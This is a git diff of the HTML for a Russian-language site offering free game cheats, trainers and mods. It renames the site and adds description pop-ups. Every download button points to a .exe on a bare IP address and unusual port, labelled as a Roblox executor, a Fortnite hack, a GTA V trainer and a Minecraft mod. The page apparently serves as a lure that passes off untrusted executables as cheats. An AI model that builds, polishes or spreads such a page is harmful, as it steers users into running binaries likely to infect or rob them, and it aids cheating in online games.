--- a/index.html
+++ b/index.html
@@ -3,32 +3,32 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>GameMods Hub</title>
+    <title>Geminixis Game Hub</title>
     <link rel="stylesheet" href="style.css">
 </head>
 <body>
     <div class="container">
         <header>
-            <h1 class="neon-text">🎮 GAMEMODS HUB</h1>
-            <p class="subtitle">Лучшие моды, читы и трейнеры</p>
+            <h1 class="neon-text">GEMINIXIS GAME HUB</h1>
+            <p class="subtitle">Лучшие бесплатные читы, трейнеры, игры</p>
         </header>
 
         <nav class="nav-buttons">
-            <button class="nav-btn neon-btn" onclick="showSection('cheats')">👾 ЧИТЫ</button>
-            <button class="nav-btn neon-btn" onclick="showSection('trainers')">⚡ ТРЕЙНЕРЫ</button>
-            <button class="nav-btn neon-btn" onclick="showSection('games')">🎯 ИГРЫ</button>
+            <button class="nav-btn neon-btn" onclick="showSection('cheats')">ЧИТЫ</button>
+            <button class="nav-btn neon-btn" onclick="showSection('trainers')">ТРЕЙНЕРЫ</button>
+            <button class="nav-btn neon-btn" onclick="showSection('games')">ИГРЫ</button>
         </nav>
 
         <!-- Секция читов -->
         <section id="cheats" class="section active">
-            <h2>👾 Популярные читы</h2>
+            <h2>Популярные читы</h2>
             <div class="download-grid">
-                <div class="download-card">
+                <div class="download-card" onclick="showDescription('xeno-desc')">
                     <h3>Xeno Executor</h3>
                     <p>Мощный инструмент для Roblox</p>
                     <a href="http://194.79.46.110:1080/mrx/xeno.exe" class="download-btn">СКАЧАТЬ</a>
                 </div>
-                <div class="download-card">
+                <div class="download-card" onclick="showDescription('fortnite-desc')">
                     <h3>Fortnite Hack</h3>
                     <p>Читы для Fortnite</p>
                     <a href="http://194.79.46.110:1080/mrx/fortnite.exe" class="download-btn">СКАЧАТЬ</a>
@@ -38,9 +38,9 @@
 
         <!-- Секция трейнеров -->
         <section id="trainers" class="section">
-            <h2>⚡ Игровые трейнеры</h2>
+            <h2>Игровые трейнеры</h2>
             <div class="download-grid">
-                <div class="download-card">
+                <div class="download-card" onclick="showDescription('gtav-desc')">
                     <h3>GTA V Trainer</h3>
                     <p>Трейнер для Grand Theft Auto V</p>
                     <a href="http://194.79.46.110:1080/mrx/gtav.exe" class="download-btn">СКАЧАТЬ</a>
@@ -50,15 +50,25 @@
 
         <!-- Секция игр -->
         <section id="games" class="section">
-            <h2>🎯 Бесплатные игры</h2>
+            <h2>Бесплатные игры</h2>
             <div class="download-grid">
-                <div class="download-card">
+                <div class="download-card" onclick="showDescription('minecraft-desc')">
                     <h3>Minecraft Mod</h3>
                     <p>Мод пак для Minecraft</p>
                     <a href="http://194.79.46.110:1080/mrx/minecraft.exe" class="download-btn">СКАЧАТЬ</a>
                 </div>
             </div>
         </section>
+    </div>
+
+    <!-- Модальное окно описания -->
+    <div id="description-modal" class="modal">
+        <div class="modal-content">
+            <span class="close" onclick="closeDescription()">&times;</span>
+            <div id="modal-body">
+                <!-- Сюда загружается описание -->
+            </div>
+        </div>
     </div>
 
     <script src="script.js"></script>
